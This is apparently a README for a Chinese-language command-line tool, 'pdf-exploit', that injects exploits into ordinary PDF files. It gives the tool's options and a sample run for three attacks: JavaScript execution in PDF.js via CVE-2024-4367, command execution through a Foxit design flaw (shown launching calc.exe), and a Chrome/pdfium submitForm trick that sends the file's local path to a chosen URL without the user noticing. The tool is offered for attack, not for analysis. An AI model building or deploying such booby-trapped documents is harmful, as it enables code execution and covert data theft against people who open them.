集成近期的一些 pdf 解析器的漏洞,制作 PDF 文档。
usage:
usage: pdf-exploit [-h] -f F [-p P] -o O [-pdfjs PDFJS] [-foxit-exec FOXIT_EXEC] [-foxit-args FOXIT_ARGS] [-submitForm SUBMITFORM]
options:
-h, --help show this help message and exit
-f F the harmless pdf path
-p P password
-o O the new pdf file
pdfjs:
CVE-2024-4367
-pdfjs PDFJS javascript to be executed, example: alert(3)
foxit:
foxit pdf 'flawed design' explotation
-foxit-exec FOXIT_EXEC
-foxit-args FOXIT_ARGS
chrome:
use submitForm of pdfium to steal pdf file path and other information
-submitForm SUBMITFORM
The url to which the pdf path will be reportedexample:
➜ pdf-exploit ./pdf.py -f ~/Downloads/data.pdf -o /tmp/data.pdf -pdfjs 'alert(3)' -foxit-exec cmd.exe -foxit-args "/c calc.exe"
[+] use the PDF.JS exploit: alert(3)
[+] make a text pdf
[+] make evil font
[+] fd ref: 9
[+] add font object to pdf: 10
[+] set font: /F1
[+] use the foxit exploit: cmd.exe /c calc.exe
set OpenAction to Catalog done
[+] store to /tmp/data.pdf
目前支持:
- CVE-2024-4367: PDF.js 解析 pdf 时存在缺陷,可以执行任意的 javascript 脚本。
- Foxit PDF 机制缺陷,windows平台下可以执行远程命令(有弹窗提醒)。
- Chrome: 借助 submitForm 来窃取对应 pdf 文件在本地的路径信息(需要点击 pdf 文件任意位置,但用户无感)